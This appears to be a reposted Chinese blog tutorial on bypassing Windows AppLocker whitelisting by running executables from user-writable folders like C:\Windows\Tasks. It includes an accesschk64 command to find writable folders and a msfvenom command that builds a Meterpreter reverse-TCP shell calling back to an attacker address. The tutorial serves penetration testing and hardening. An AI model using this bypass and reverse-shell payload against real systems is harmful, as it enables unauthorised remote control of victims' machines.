• 使用弱路径规则绕过应用程序白名单


    当您是渗透测试团队的一员时,发现漏洞非常重要。由于此类漏洞是黑客入侵的根源,因此攻击者会积极寻找它们。因此,为了修补此类漏洞,您必须知道如何以及在何处找到它们。此类漏洞之一就是Windows中的弱文件夹。

    为了保护窗户,Microsoft提供了多种安全策略。其中一种策略不允许执行exe文件,这意味着可以由攻击者发送的恶意exe文件将无法在目标PC上运行。要应用此类策略,您需要进入Windows> Applocker>可执行规则>的本地安全策略,然后应用该策略。您可以在下面的图像中看到,已设置了默认规则。

    现在,如果您尝试运行任何给定的.exe文件,它将不会运行。在这里,我尝试执行putty.exe文件,但是如您在下图中所看到的,它没有运行。

    此策略的漏洞在于,尽管有这样的安全策略,但仍然只有很少的文件夹具有写和读权限,并且此类文件将从这些文件夹中执行。如果我在C驱动器> Windows>任务文件夹中运行相同的exe,即putty.exe,则它将如下图所示执行。

    要检查哪些文件夹具有读写权限,可以使用以下命令:

    1

    accesschk64.exe "Users" c:/Windows -w

    使用此命令,您可以在下图中看到,除了临时文件夹,任务文件夹和跟踪文件夹之外,其他所有访问都被拒绝。

    现在让我们尝试使用msfvenom通过以下命令针对目标PC创建的恶意软件:

    1

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f exe > shell.exe

    当您在受害者的PC中执行上述恶意软件时,由于适用的安全策略,该恶意软件将无法运行。

    但是,如果使用漏洞,则可以从task文件夹执行文件,如下图所示:

    然后,您将根据需要进行会话。

    因此,在提供安全性或攻击时,您必须了解目标计算机的所有知识,以便您可以针对它们使用它们的安全性,或者通过修补此类漏洞来提供更好的安全性。

  • 相关阅读:
    hadoop-1.2.1-1.x86_64.rpm、jdk-7u45-linux-x64.tar.gz安装(64位)
    如何卸载rpm包
    html+css基础知识总结
    css常用公共样式
    jquery时间控件datepicker
    jquery事件重复绑定的快速解决方法
    原生javascript里jsonp的实现原理
    Bootstrap分页插件--Bootstrap Paginator
    数据库基础知识(1)--数据库php连接
    jQuery radio取值,checkbox取值,select取值
  • 原文地址:https://www.cnblogs.com/sup3rman/p/13745089.html
Copyright © 2020-2023  润新知